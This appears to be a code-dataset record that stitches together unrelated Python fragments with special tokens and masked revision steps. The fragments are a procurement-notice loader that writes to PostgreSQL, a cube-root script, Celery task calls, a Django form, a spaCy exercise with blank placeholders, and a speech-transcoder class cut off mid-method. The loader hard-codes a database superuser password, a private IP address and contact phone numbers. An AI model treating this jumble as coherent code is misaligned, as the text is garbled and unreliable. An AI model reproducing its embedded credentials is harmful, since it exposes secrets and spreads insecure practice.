if __name__ == '__main__':
prosql()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
data_list = [{'projectName': '伊犁哈萨克自治州友谊医院开发区分院保洁服务项目', 'pingmu': '服务',
'purUnit': '新疆伊犁哈萨克自治州友谊医院', 'adminiArea': '新疆维吾尔自治区', 'bulletTime':
'2020年09月02日 19:20', 'obtBidTime':
'2020年09月02日至2020年09月09日每日上午:00:00 至 12:00\xa0\xa0下午:12:00 至 23:59(北京时间,法定节假日除外)'
, 'bidDocPrice': '¥500', 'obtBidLoc': '伊宁市经济合作区福安·西城国际1416室',
'staBidTime': '', 'staLoc': '伊宁市海棠路3号州财政局办公楼附楼1层州政府采购中心 一楼招标厅',
'budget': '¥807.000000万元(人民币)', 'proContact': '胡川', 'proPhone':
'18690293446', 'purAddress': '伊宁市斯大林街92号', 'purUnitPhone':
'0999-8024023', 'agentName': '新疆诚成工程项目管理有限公司', 'agentAddress': '详见公告正文',
'agentPhone': '18690293446'}, {'projectName': '旅顺口医疗区医用氧气管道检修采购项目',
'pingmu': '服务/维修和保养服务/其他维修和保养服务', 'purUnit': '中国人民解放军联勤保障部队第九六七医院',
'adminiArea': '大连市', 'bulletTime': '2020年09月02日 19:52', 'obtBidTime':
'2020年09月02日至2020年09月07日每日上午:8:30 至 11:30\xa0\xa0下午:13:00 至 16:30(北京时间,法定节假日除外)'
, 'budget': '¥0.000000万元(人民币)', 'proContact': '廖大成,尹辉', 'proPhone':
'0411-80841295 0411-80841296', 'purAddress': '辽宁省大连市西岗区胜利路80号',
'purUnitPhone': '廖大成,尹辉 0411-80841295 0411-80841296', 'agentName':
'中国人民解放军联勤保障部队第九六七医院', 'agentAddress': '辽宁省大连市西岗区胜利路80号', 'agentPhone':
'廖大成,尹辉 0411-80841295 0411-80841296', 'appendix':
'{"2.报价书氧气管道检修.docx": "http://www.ccgp.gov.cn/oss/download?uuid=88FCEC822374C5002F6DD48B15DC44", "3.货物指标及要求氧气管道检修.docx": "http://www.ccgp.gov.cn/oss/download?uuid=2773DFCD00839B5E034DA43339EDF1"}'
}]
dict_tmp = {}
values_list = []
result = []
def processJson(dic):
dicobj = json.loads(dic)
print(dicobj)
for k, v in dicobj.items():
dict_tmp = {}
dict_tmp['file_name'] = k
dict_tmp['urls'] = v
print(k)
print(v)
result.append(dict_tmp)
return result
def procesV():
for i in data_list:
if 'appendix' in i.keys():
appendix = i['appendix']
if appendix != '':
fj = processJson(i['appendix'])
print(fj)
fjs = json.dumps(fj, ensure_ascii=False)
values_list.append(('testtest', fjs))
def prosql():
hostname = '172.18.11.26'
username = 'postgres'
password = 'postgres_cnhis@#$'
database = 'ai'
conn = pg.connect(database=database, user=username, password=password,
host=hostname, port='5432')
cursor = conn.cursor()
procesV()
sql = """insert into ho_sysnc_third_customer_data("purchased_project_name","fj_json")
values %s
"""
ex.execute_values(cursor, sql, values_list, page_size=10000)
conn.commit()
conn.close()
cursor.close()
if __name__ == '__main__':
prosql()
<|reserved_special_token_1|>
from psycopg2 import extras as ex
import psycopg2 as pg
import json
import datetime
import os
from functools import reduce
data_list = [{'projectName': '伊犁哈萨克自治州友谊医院开发区分院保洁服务项目', 'pingmu': '服务',
'purUnit': '新疆伊犁哈萨克自治州友谊医院', 'adminiArea': '新疆维吾尔自治区', 'bulletTime':
'2020年09月02日 19:20', 'obtBidTime':
'2020年09月02日至2020年09月09日每日上午:00:00 至 12:00\xa0\xa0下午:12:00 至 23:59(北京时间,法定节假日除外)'
, 'bidDocPrice': '¥500', 'obtBidLoc': '伊宁市经济合作区福安·西城国际1416室',
'staBidTime': '', 'staLoc': '伊宁市海棠路3号州财政局办公楼附楼1层州政府采购中心 一楼招标厅',
'budget': '¥807.000000万元(人民币)', 'proContact': '胡川', 'proPhone':
'18690293446', 'purAddress': '伊宁市斯大林街92号', 'purUnitPhone':
'0999-8024023', 'agentName': '新疆诚成工程项目管理有限公司', 'agentAddress': '详见公告正文',
'agentPhone': '18690293446'}, {'projectName': '旅顺口医疗区医用氧气管道检修采购项目',
'pingmu': '服务/维修和保养服务/其他维修和保养服务', 'purUnit': '中国人民解放军联勤保障部队第九六七医院',
'adminiArea': '大连市', 'bulletTime': '2020年09月02日 19:52', 'obtBidTime':
'2020年09月02日至2020年09月07日每日上午:8:30 至 11:30\xa0\xa0下午:13:00 至 16:30(北京时间,法定节假日除外)'
, 'budget': '¥0.000000万元(人民币)', 'proContact': '廖大成,尹辉', 'proPhone':
'0411-80841295 0411-80841296', 'purAddress': '辽宁省大连市西岗区胜利路80号',
'purUnitPhone': '廖大成,尹辉 0411-80841295 0411-80841296', 'agentName':
'中国人民解放军联勤保障部队第九六七医院', 'agentAddress': '辽宁省大连市西岗区胜利路80号', 'agentPhone':
'廖大成,尹辉 0411-80841295 0411-80841296', 'appendix':
'{"2.报价书氧气管道检修.docx": "http://www.ccgp.gov.cn/oss/download?uuid=88FCEC822374C5002F6DD48B15DC44", "3.货物指标及要求氧气管道检修.docx": "http://www.ccgp.gov.cn/oss/download?uuid=2773DFCD00839B5E034DA43339EDF1"}'
}]
dict_tmp = {}
values_list = []
result = []
def processJson(dic):
dicobj = json.loads(dic)
print(dicobj)
for k, v in dicobj.items():
dict_tmp = {}
dict_tmp['file_name'] = k
dict_tmp['urls'] = v
print(k)
print(v)
result.append(dict_tmp)
return result
def procesV():
for i in data_list:
if 'appendix' in i.keys():
appendix = i['appendix']
if appendix != '':
fj = processJson(i['appendix'])
print(fj)
fjs = json.dumps(fj, ensure_ascii=False)
values_list.append(('testtest', fjs))
def prosql():
hostname = '172.18.11.26'
username = 'postgres'
password = 'postgres_cnhis@#$'
database = 'ai'
conn = pg.connect(database=database, user=username, password=password,
host=hostname, port='5432')
cursor = conn.cursor()
procesV()
sql = """insert into ho_sysnc_third_customer_data("purchased_project_name","fj_json")
values %s
"""
ex.execute_values(cursor, sql, values_list, page_size=10000)
conn.commit()
conn.close()
cursor.close()
if __name__ == '__main__':
prosql()
<|reserved_special_token_1|>
from psycopg2 import extras as ex
import psycopg2 as pg
import json
import datetime
import os
from functools import reduce
data_list = [{'projectName': '伊犁哈萨克自治州友谊医院开发区分院保洁服务项目', 'pingmu': '服务', 'purUnit': '新疆伊犁哈萨克自治州友谊医院', 'adminiArea': '新疆维吾尔自治区', 'bulletTime': '2020年09月02日 19:20', 'obtBidTime': '2020年09月02日至2020年09月09日每日上午:00:00 至 12:00\xa0\xa0下午:12:00 至 23:59(北京时间,法定节假日除外)', 'bidDocPrice': '¥500', 'obtBidLoc': '伊宁市经济合作区福安·西城国际1416室', 'staBidTime': '', 'staLoc': '伊宁市海棠路3号州财政局办公楼附楼1层州政府采购中心 一楼招标厅', 'budget': '¥807.000000万元(人民币)', 'proContact': '胡川', 'proPhone': '18690293446', 'purAddress': '伊宁市斯大林街92号', 'purUnitPhone': '0999-8024023', 'agentName': '新疆诚成工程项目管理有限公司', 'agentAddress': '详见公告正文', 'agentPhone': '18690293446'}
, {'projectName': '旅顺口医疗区医用氧气管道检修采购项目', 'pingmu': '服务/维修和保养服务/其他维修和保养服务', 'purUnit': '中国人民解放军联勤保障部队第九六七医院', 'adminiArea': '大连市', 'bulletTime': '2020年09月02日 19:52', 'obtBidTime': '2020年09月02日至2020年09月07日每日上午:8:30 至 11:30\xa0\xa0下午:13:00 至 16:30(北京时间,法定节假日除外)', 'budget': '¥0.000000万元(人民币)', 'proContact': '廖大成,尹辉', 'proPhone': '0411-80841295 0411-80841296', 'purAddress': '辽宁省大连市西岗区胜利路80号', 'purUnitPhone': '廖大成,尹辉 0411-80841295 0411-80841296', 'agentName': '中国人民解放军联勤保障部队第九六七医院', 'agentAddress': '辽宁省大连市西岗区胜利路80号', 'agentPhone': '廖大成,尹辉 0411-80841295 0411-80841296', 'appendix': '{"2.报价书氧气管道检修.docx": "http://www.ccgp.gov.cn/oss/download?uuid=88FCEC822374C5002F6DD48B15DC44", "3.货物指标及要求氧气管道检修.docx": "http://www.ccgp.gov.cn/oss/download?uuid=2773DFCD00839B5E034DA43339EDF1"}'}
]
# Scratch dict left over from development; processJson() builds its own
# per-entry dicts, so this module-level one is unused in practice.
dict_tmp={}
# Rows destined for the bulk INSERT: (purchased_project_name, fj_json) tuples.
values_list = []
# Accumulator appended to by processJson() calls.
result = []
def processJson(dic):
    """Parse an appendix JSON string into a list of attachment records.

    Args:
        dic: JSON string mapping attachment file names to download URLs.

    Returns:
        list[dict]: one ``{'file_name': ..., 'urls': ...}`` entry per file,
        in the order the keys appear in the JSON.
    """
    # Build a fresh list instead of appending to the module-level ``result``:
    # the original accumulated entries across calls, so the appendix list of
    # a second record would also contain the first record's files.
    entries = []
    for file_name, url in json.loads(dic).items():
        entries.append({'file_name': file_name, 'urls': url})
    return entries
def procesV():
    """Collect attachment info for every crawled record.

    For each record in ``data_list`` that carries a non-empty ``appendix``
    JSON string, parse it with ``processJson`` and append a
    ``(project_name, attachments_json)`` tuple to ``values_list``.
    """
    for record in data_list:
        appendix = record.get("appendix", "")
        if appendix != "":
            attachments = processJson(appendix)
            print(attachments)
            payload = json.dumps(attachments, ensure_ascii=False)
            values_list.append(("testtest", payload))
def prosql():
    """Insert the collected appendix rows into PostgreSQL.

    Connects to the ``ai`` database, fills ``values_list`` via ``procesV()``,
    then bulk-inserts the tuples with ``execute_values``.
    """
    # NOTE(review): credentials are hard-coded — move them to environment
    # variables or a config file before this leaves a test environment.
    hostname = '172.18.11.26'
    username = 'postgres'
    password = 'postgres_cnhis@#$'
    database = 'ai'
    conn = pg.connect(database=database, user=username, password=password, host=hostname, port="5432")
    cursor = conn.cursor()
    try:
        procesV()
        sql = '''insert into ho_sysnc_third_customer_data("purchased_project_name","fj_json")
            values %s
        '''
        # execute_values expands the single VALUES %s placeholder; page_size
        # caps the number of rows per generated statement (default is 100).
        ex.execute_values(cursor, sql, values_list, page_size=10000)
        conn.commit()
    finally:
        # Close the cursor before the connection — the original closed the
        # connection first, so cursor.close() ran on an already-dead handle.
        cursor.close()
        conn.close()
# Script entry point: run the crawl-to-database pipeline.
if __name__ =='__main__':
    prosql()
    # procesV()
|
flexible
|
{
"blob_id": "e9af8f7830be7db3ca57b0a24de48ef7fcb08d6c",
"index": 8453,
"step-1": "<mask token>\n\n\ndef processJson(dic):\n dicobj = json.loads(dic)\n print(dicobj)\n for k, v in dicobj.items():\n dict_tmp = {}\n dict_tmp['file_name'] = k\n dict_tmp['urls'] = v\n print(k)\n print(v)\n result.append(dict_tmp)\n return result\n\n\ndef procesV():\n for i in data_list:\n if 'appendix' in i.keys():\n appendix = i['appendix']\n if appendix != '':\n fj = processJson(i['appendix'])\n print(fj)\n fjs = json.dumps(fj, ensure_ascii=False)\n values_list.append(('testtest', fjs))\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef processJson(dic):\n dicobj = json.loads(dic)\n print(dicobj)\n for k, v in dicobj.items():\n dict_tmp = {}\n dict_tmp['file_name'] = k\n dict_tmp['urls'] = v\n print(k)\n print(v)\n result.append(dict_tmp)\n return result\n\n\ndef procesV():\n for i in data_list:\n if 'appendix' in i.keys():\n appendix = i['appendix']\n if appendix != '':\n fj = processJson(i['appendix'])\n print(fj)\n fjs = json.dumps(fj, ensure_ascii=False)\n values_list.append(('testtest', fjs))\n\n\ndef prosql():\n hostname = '172.18.11.26'\n username = 'postgres'\n password = 'postgres_cnhis@#$'\n database = 'ai'\n conn = pg.connect(database=database, user=username, password=password,\n host=hostname, port='5432')\n cursor = conn.cursor()\n procesV()\n sql = \"\"\"insert into ho_sysnc_third_customer_data(\"purchased_project_name\",\"fj_json\")\n values %s\n \"\"\"\n ex.execute_values(cursor, sql, values_list, page_size=10000)\n conn.commit()\n conn.close()\n cursor.close()\n\n\nif __name__ == '__main__':\n prosql()\n",
"step-3": "<mask token>\ndata_list = [{'projectName': '伊犁哈萨克自治州友谊医院开发区分院保洁服务项目', 'pingmu': '服务',\n 'purUnit': '新疆伊犁哈萨克自治州友谊医院', 'adminiArea': '新疆维吾尔自治区', 'bulletTime':\n '2020年09月02日 19:20', 'obtBidTime':\n '2020年09月02日至2020年09月09日每日上午:00:00 至 12:00\\xa0\\xa0下午:12:00 至 23:59(北京时间,法定节假日除外)'\n , 'bidDocPrice': '¥500', 'obtBidLoc': '伊宁市经济合作区福安·西城国际1416室',\n 'staBidTime': '', 'staLoc': '伊宁市海棠路3号州财政局办公楼附楼1层州政府采购中心 一楼招标厅',\n 'budget': '¥807.000000万元(人民币)', 'proContact': '胡川', 'proPhone':\n '18690293446', 'purAddress': '伊宁市斯大林街92号', 'purUnitPhone':\n '0999-8024023', 'agentName': '新疆诚成工程项目管理有限公司', 'agentAddress': '详见公告正文',\n 'agentPhone': '18690293446'}, {'projectName': '旅顺口医疗区医用氧气管道检修采购项目',\n 'pingmu': '服务/维修和保养服务/其他维修和保养服务', 'purUnit': '中国人民解放军联勤保障部队第九六七医院',\n 'adminiArea': '大连市', 'bulletTime': '2020年09月02日 19:52', 'obtBidTime':\n '2020年09月02日至2020年09月07日每日上午:8:30 至 11:30\\xa0\\xa0下午:13:00 至 16:30(北京时间,法定节假日除外)'\n , 'budget': '¥0.000000万元(人民币)', 'proContact': '廖大成,尹辉', 'proPhone':\n '0411-80841295 0411-80841296', 'purAddress': '辽宁省大连市西岗区胜利路80号',\n 'purUnitPhone': '廖大成,尹辉 0411-80841295 0411-80841296', 'agentName':\n '中国人民解放军联勤保障部队第九六七医院', 'agentAddress': '辽宁省大连市西岗区胜利路80号', 'agentPhone':\n '廖大成,尹辉 0411-80841295 0411-80841296', 'appendix':\n '{\"2.报价书氧气管道检修.docx\": \"http://www.ccgp.gov.cn/oss/download?uuid=88FCEC822374C5002F6DD48B15DC44\", \"3.货物指标及要求氧气管道检修.docx\": \"http://www.ccgp.gov.cn/oss/download?uuid=2773DFCD00839B5E034DA43339EDF1\"}'\n }]\ndict_tmp = {}\nvalues_list = []\nresult = []\n\n\ndef processJson(dic):\n dicobj = json.loads(dic)\n print(dicobj)\n for k, v in dicobj.items():\n dict_tmp = {}\n dict_tmp['file_name'] = k\n dict_tmp['urls'] = v\n print(k)\n print(v)\n result.append(dict_tmp)\n return result\n\n\ndef procesV():\n for i in data_list:\n if 'appendix' in i.keys():\n appendix = i['appendix']\n if appendix != '':\n fj = processJson(i['appendix'])\n print(fj)\n fjs = json.dumps(fj, ensure_ascii=False)\n values_list.append(('testtest', fjs))\n\n\ndef 
prosql():\n hostname = '172.18.11.26'\n username = 'postgres'\n password = 'postgres_cnhis@#$'\n database = 'ai'\n conn = pg.connect(database=database, user=username, password=password,\n host=hostname, port='5432')\n cursor = conn.cursor()\n procesV()\n sql = \"\"\"insert into ho_sysnc_third_customer_data(\"purchased_project_name\",\"fj_json\")\n values %s\n \"\"\"\n ex.execute_values(cursor, sql, values_list, page_size=10000)\n conn.commit()\n conn.close()\n cursor.close()\n\n\nif __name__ == '__main__':\n prosql()\n",
"step-4": "from psycopg2 import extras as ex\nimport psycopg2 as pg\nimport json\nimport datetime\nimport os\nfrom functools import reduce\ndata_list = [{'projectName': '伊犁哈萨克自治州友谊医院开发区分院保洁服务项目', 'pingmu': '服务',\n 'purUnit': '新疆伊犁哈萨克自治州友谊医院', 'adminiArea': '新疆维吾尔自治区', 'bulletTime':\n '2020年09月02日 19:20', 'obtBidTime':\n '2020年09月02日至2020年09月09日每日上午:00:00 至 12:00\\xa0\\xa0下午:12:00 至 23:59(北京时间,法定节假日除外)'\n , 'bidDocPrice': '¥500', 'obtBidLoc': '伊宁市经济合作区福安·西城国际1416室',\n 'staBidTime': '', 'staLoc': '伊宁市海棠路3号州财政局办公楼附楼1层州政府采购中心 一楼招标厅',\n 'budget': '¥807.000000万元(人民币)', 'proContact': '胡川', 'proPhone':\n '18690293446', 'purAddress': '伊宁市斯大林街92号', 'purUnitPhone':\n '0999-8024023', 'agentName': '新疆诚成工程项目管理有限公司', 'agentAddress': '详见公告正文',\n 'agentPhone': '18690293446'}, {'projectName': '旅顺口医疗区医用氧气管道检修采购项目',\n 'pingmu': '服务/维修和保养服务/其他维修和保养服务', 'purUnit': '中国人民解放军联勤保障部队第九六七医院',\n 'adminiArea': '大连市', 'bulletTime': '2020年09月02日 19:52', 'obtBidTime':\n '2020年09月02日至2020年09月07日每日上午:8:30 至 11:30\\xa0\\xa0下午:13:00 至 16:30(北京时间,法定节假日除外)'\n , 'budget': '¥0.000000万元(人民币)', 'proContact': '廖大成,尹辉', 'proPhone':\n '0411-80841295 0411-80841296', 'purAddress': '辽宁省大连市西岗区胜利路80号',\n 'purUnitPhone': '廖大成,尹辉 0411-80841295 0411-80841296', 'agentName':\n '中国人民解放军联勤保障部队第九六七医院', 'agentAddress': '辽宁省大连市西岗区胜利路80号', 'agentPhone':\n '廖大成,尹辉 0411-80841295 0411-80841296', 'appendix':\n '{\"2.报价书氧气管道检修.docx\": \"http://www.ccgp.gov.cn/oss/download?uuid=88FCEC822374C5002F6DD48B15DC44\", \"3.货物指标及要求氧气管道检修.docx\": \"http://www.ccgp.gov.cn/oss/download?uuid=2773DFCD00839B5E034DA43339EDF1\"}'\n }]\ndict_tmp = {}\nvalues_list = []\nresult = []\n\n\ndef processJson(dic):\n dicobj = json.loads(dic)\n print(dicobj)\n for k, v in dicobj.items():\n dict_tmp = {}\n dict_tmp['file_name'] = k\n dict_tmp['urls'] = v\n print(k)\n print(v)\n result.append(dict_tmp)\n return result\n\n\ndef procesV():\n for i in data_list:\n if 'appendix' in i.keys():\n appendix = i['appendix']\n if appendix != '':\n fj = 
processJson(i['appendix'])\n print(fj)\n fjs = json.dumps(fj, ensure_ascii=False)\n values_list.append(('testtest', fjs))\n\n\ndef prosql():\n hostname = '172.18.11.26'\n username = 'postgres'\n password = 'postgres_cnhis@#$'\n database = 'ai'\n conn = pg.connect(database=database, user=username, password=password,\n host=hostname, port='5432')\n cursor = conn.cursor()\n procesV()\n sql = \"\"\"insert into ho_sysnc_third_customer_data(\"purchased_project_name\",\"fj_json\")\n values %s\n \"\"\"\n ex.execute_values(cursor, sql, values_list, page_size=10000)\n conn.commit()\n conn.close()\n cursor.close()\n\n\nif __name__ == '__main__':\n prosql()\n",
"step-5": "from psycopg2 import extras as ex\nimport psycopg2 as pg\nimport json\nimport datetime\nimport os\nfrom functools import reduce\n\n\ndata_list = [{'projectName': '伊犁哈萨克自治州友谊医院开发区分院保洁服务项目', 'pingmu': '服务', 'purUnit': '新疆伊犁哈萨克自治州友谊医院', 'adminiArea': '新疆维吾尔自治区', 'bulletTime': '2020年09月02日 19:20', 'obtBidTime': '2020年09月02日至2020年09月09日每日上午:00:00 至 12:00\\xa0\\xa0下午:12:00 至 23:59(北京时间,法定节假日除外)', 'bidDocPrice': '¥500', 'obtBidLoc': '伊宁市经济合作区福安·西城国际1416室', 'staBidTime': '', 'staLoc': '伊宁市海棠路3号州财政局办公楼附楼1层州政府采购中心 一楼招标厅', 'budget': '¥807.000000万元(人民币)', 'proContact': '胡川', 'proPhone': '18690293446', 'purAddress': '伊宁市斯大林街92号', 'purUnitPhone': '0999-8024023', 'agentName': '新疆诚成工程项目管理有限公司', 'agentAddress': '详见公告正文', 'agentPhone': '18690293446'}\n , {'projectName': '旅顺口医疗区医用氧气管道检修采购项目', 'pingmu': '服务/维修和保养服务/其他维修和保养服务', 'purUnit': '中国人民解放军联勤保障部队第九六七医院', 'adminiArea': '大连市', 'bulletTime': '2020年09月02日 19:52', 'obtBidTime': '2020年09月02日至2020年09月07日每日上午:8:30 至 11:30\\xa0\\xa0下午:13:00 至 16:30(北京时间,法定节假日除外)', 'budget': '¥0.000000万元(人民币)', 'proContact': '廖大成,尹辉', 'proPhone': '0411-80841295 0411-80841296', 'purAddress': '辽宁省大连市西岗区胜利路80号', 'purUnitPhone': '廖大成,尹辉 0411-80841295 0411-80841296', 'agentName': '中国人民解放军联勤保障部队第九六七医院', 'agentAddress': '辽宁省大连市西岗区胜利路80号', 'agentPhone': '廖大成,尹辉 0411-80841295 0411-80841296', 'appendix': '{\"2.报价书氧气管道检修.docx\": \"http://www.ccgp.gov.cn/oss/download?uuid=88FCEC822374C5002F6DD48B15DC44\", \"3.货物指标及要求氧气管道检修.docx\": \"http://www.ccgp.gov.cn/oss/download?uuid=2773DFCD00839B5E034DA43339EDF1\"}'}\n ]\n\n\ndict_tmp={}\nvalues_list = []\nresult = []\ndef processJson(dic):\n dicobj = json.loads(dic)\n print(dicobj)\n for k,v in dicobj.items():\n dict_tmp = {}\n dict_tmp[\"file_name\"] = k\n dict_tmp[\"urls\"] =v\n print(k)\n print(v)\n result.append(dict_tmp)\n # dict_tmp.clear()\n return result\n\ndef procesV():\n for i in data_list:\n if \"appendix\" in i.keys():\n appendix = i[\"appendix\"]\n if appendix != \"\":\n fj = 
processJson(i[\"appendix\"])\n print(fj)\n fjs = json.dumps(fj,ensure_ascii=False)\n values_list.append((\"testtest\",fjs))\n\ndef prosql():\n # values 后面直接%s\n hostname = '172.18.11.26'\n username = 'postgres'\n password = 'postgres_cnhis@#$'\n database = 'ai'\n conn = pg.connect(database=database, user=username, password=password, host=hostname, port=\"5432\")\n cursor = conn.cursor()\n procesV()\n sql = '''insert into ho_sysnc_third_customer_data(\"purchased_project_name\",\"fj_json\")\n values %s\n '''\n # 其中函数中的page_size参数默认为100,表示每个statement包含的最大条目数,\n # 如果传过来的argslist长度大于page_size,则该函数最多执行len(argslist)/page_size + 1次。\n ex.execute_values(cursor, sql, values_list, page_size=10000)\n conn.commit()\n\n conn.close()\n cursor.close()\n\n\n\n\nif __name__ =='__main__':\n prosql()\n # procesV()\n",
"step-ids": [
2,
4,
5,
6,
7
]
}
|
[
2,
4,
5,
6,
7
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def raizCubica(numero):
r = pow(numero, 1 / 3)
return r
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def raizCubica(numero):
r = pow(numero, 1 / 3)
return r
<|reserved_special_token_0|>
for x in range(5):
numeros.insert(x, float(input('Ingrese Numero: ')))
raices.insert(x, round(raizCubica(numeros[x]), 3))
print('Numeros: ', numeros)
print('Raices: ', raices)
<|reserved_special_token_1|>
def raizCubica(numero):
r = pow(numero, 1 / 3)
return r
numeros = []
raices = []
for x in range(5):
numeros.insert(x, float(input('Ingrese Numero: ')))
raices.insert(x, round(raizCubica(numeros[x]), 3))
print('Numeros: ', numeros)
print('Raices: ', raices)
<|reserved_special_token_1|>
def raizCubica(numero):
    """Return the cube root of ``numero`` (computed as numero ** (1/3))."""
    return numero ** (1 / 3)
# Parallel lists: the 5 numbers the user types, and their cube roots.
numeros = []
raices = []
# Read five numbers interactively; store each cube root rounded to 3 decimals.
for x in range(5):
    numeros.insert(x, float(input("Ingrese Numero: ")))
    raices.insert(x, round(raizCubica(numeros[x]),3))
# Echo both lists back to the user.
print("Numeros: ", numeros)
print("Raices: ", raices)
|
flexible
|
{
"blob_id": "180f7f0ade9770c6669680bd13ac8f2fd55cc8c7",
"index": 357,
"step-1": "<mask token>\n",
"step-2": "def raizCubica(numero):\n r = pow(numero, 1 / 3)\n return r\n\n\n<mask token>\n",
"step-3": "def raizCubica(numero):\n r = pow(numero, 1 / 3)\n return r\n\n\n<mask token>\nfor x in range(5):\n numeros.insert(x, float(input('Ingrese Numero: ')))\n raices.insert(x, round(raizCubica(numeros[x]), 3))\nprint('Numeros: ', numeros)\nprint('Raices: ', raices)\n",
"step-4": "def raizCubica(numero):\n r = pow(numero, 1 / 3)\n return r\n\n\nnumeros = []\nraices = []\nfor x in range(5):\n numeros.insert(x, float(input('Ingrese Numero: ')))\n raices.insert(x, round(raizCubica(numeros[x]), 3))\nprint('Numeros: ', numeros)\nprint('Raices: ', raices)\n",
"step-5": "def raizCubica(numero):\n r = pow(numero,(1/3))\n return r\n\nnumeros = []\nraices = []\n\nfor x in range(5):\n numeros.insert(x, float(input(\"Ingrese Numero: \")))\n raices.insert(x, round(raizCubica(numeros[x]),3))\n\nprint(\"Numeros: \", numeros)\nprint(\"Raices: \", raices)",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from adventurelib import *
from horror import *
from dating import *
from popquiz import *
from comedy import *
from island import *
# Launch the adventurelib game loop; the star-imports above presumably
# register the rooms/commands for each scenario as side effects — TODO confirm.
start()
|
normal
|
{
"blob_id": "8a37299154aded37147e1650cbf52a5cdf7d91da",
"index": 4225,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nstart()\n",
"step-3": "from adventurelib import *\nfrom horror import *\nfrom dating import *\nfrom popquiz import *\nfrom comedy import *\nfrom island import *\nstart()\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
from tasks import video_compress, video_upload
# Demo driver: enqueue tasks onto dedicated priority queues.
# NOTE(review): apply_async/queue suggests Celery tasks — workers must be
# started with ``-Q high`` / ``-Q low`` to consume these; confirm in tasks.py.
if __name__ == '__main__':
    video_compress.apply_async(["a"],queue='high')
    video_compress.apply_async(["b"],queue='low')
    video_upload.apply_async(["c"], queue='low')
    video_upload.apply_async(["d"], queue='high')
|
normal
|
{
"blob_id": "2cd7d4fe87de66e85bc0d060e2eaa68be39eed02",
"index": 9461,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif __name__ == '__main__':\n video_compress.apply_async(['a'], queue='high')\n video_compress.apply_async(['b'], queue='low')\n video_upload.apply_async(['c'], queue='low')\n video_upload.apply_async(['d'], queue='high')\n",
"step-3": "from tasks import video_compress, video_upload\nif __name__ == '__main__':\n video_compress.apply_async(['a'], queue='high')\n video_compress.apply_async(['b'], queue='low')\n video_upload.apply_async(['c'], queue='low')\n video_upload.apply_async(['d'], queue='high')\n",
"step-4": "from tasks import video_compress, video_upload\nif __name__ == '__main__':\n video_compress.apply_async([\"a\"],queue='high')\n video_compress.apply_async([\"b\"],queue='low')\n video_upload.apply_async([\"c\"], queue='low')\n video_upload.apply_async([\"d\"], queue='high')\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from django import forms
class UploadForm(forms.Form):
    """Django form with a single file-upload field for shipment data."""

    # Label (Russian): "JSON with shipment data" — shown to the user in the UI.
    file = forms.FileField(label="Json с данными об отправлении")
|
normal
|
{
"blob_id": "0878bfa1151371ff3aaa59f8be5ea9af74ada331",
"index": 4978,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass UploadForm(forms.Form):\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass UploadForm(forms.Form):\n file = forms.FileField(label='Json с данными об отправлении')\n",
"step-4": "from django import forms\n\n\nclass UploadForm(forms.Form):\n file = forms.FileField(label='Json с данными об отправлении')\n",
"step-5": "from django import forms\n\n\nclass UploadForm(forms.Form):\n file = forms.FileField(label=\"Json с данными об отправлении\")\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import spacy
# Exercise template: the ``____`` placeholders must be filled in by the
# learner, so this file is intentionally not runnable as-is.
nlp = spacy.load("en_core_web_sm")
text = (
    "Chick-fil-A is an American fast food restaurant chain headquartered in "
    "the city of College Park, Georgia, specializing in chicken sandwiches."
)
# Disable the tagger and parser while processing (context manager on ``nlp``)
with ____.____(____):
    # Process the text with the pipeline
    doc = ____
    # Print the entities in the doc
    print(____)
|
normal
|
{
"blob_id": "6eecf0ff1ad762089db6e9498e906e68b507370c",
"index": 1875,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwith ____.____(____):\n doc = ____\n print(____)\n",
"step-3": "<mask token>\nnlp = spacy.load('en_core_web_sm')\ntext = (\n 'Chick-fil-A is an American fast food restaurant chain headquartered in the city of College Park, Georgia, specializing in chicken sandwiches.'\n )\nwith ____.____(____):\n doc = ____\n print(____)\n",
"step-4": "import spacy\nnlp = spacy.load('en_core_web_sm')\ntext = (\n 'Chick-fil-A is an American fast food restaurant chain headquartered in the city of College Park, Georgia, specializing in chicken sandwiches.'\n )\nwith ____.____(____):\n doc = ____\n print(____)\n",
"step-5": "import spacy\n\nnlp = spacy.load(\"en_core_web_sm\")\ntext = (\n \"Chick-fil-A is an American fast food restaurant chain headquartered in \"\n \"the city of College Park, Georgia, specializing in chicken sandwiches.\"\n)\n\n# Disable the tagger and parser\nwith ____.____(____):\n # Process the text\n doc = ____\n # Print the entities in the doc\n print(____)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# -*- coding: utf-8 -*-
"""Transcoder with TOSHIBA RECAIUS API."""
import threading
import queue
import time
import numpy as np
from logzero import logger
import requests
import model.key
AUTH_URL = 'https://api.recaius.jp/auth/v2/tokens'
VOICE_URL = 'https://api.recaius.jp/asr/v2/voices'
class Transcoder:
    """Streaming speech-to-text transcoder backed by the RECAIUS ASR API.

    Audio chunks pushed via ``write_stream`` are queued, converted to 16-bit
    PCM, and uploaded to the RECAIUS voice endpoint from a background thread;
    the newest recognition text is exposed on ``self.transcript``.
    """

    def __init__(self):
        """Initialize state; no network activity happens here."""
        logger.info('__init__:Enter')
        # Token handed to start(); note that _process() performs its own
        # authentication and does not actually read this attribute.
        self._token = None
        # Latest (partial or final) recognition result text.
        self.transcript = None
        # Thread-safe hand-off of raw audio chunks from the producer
        # (write_stream) to the background recognition thread.
        self._queue = queue.Queue()

    def start(self, token):
        """Start recognition in a background (non-daemon) thread."""
        logger.info('start:Enter')
        self._token = token
        threading.Thread(target=self._process).start()

    def write_stream(self, buf):
        """Queue an audio chunk for recognition.

        Pushing ``None`` signals end-of-stream and stops the worker loop.
        """
        self._queue.put(buf)

    def _process(self):
        """Worker loop: authenticate, stream audio chunks, drain results."""
        logger.info('_process:Enter')
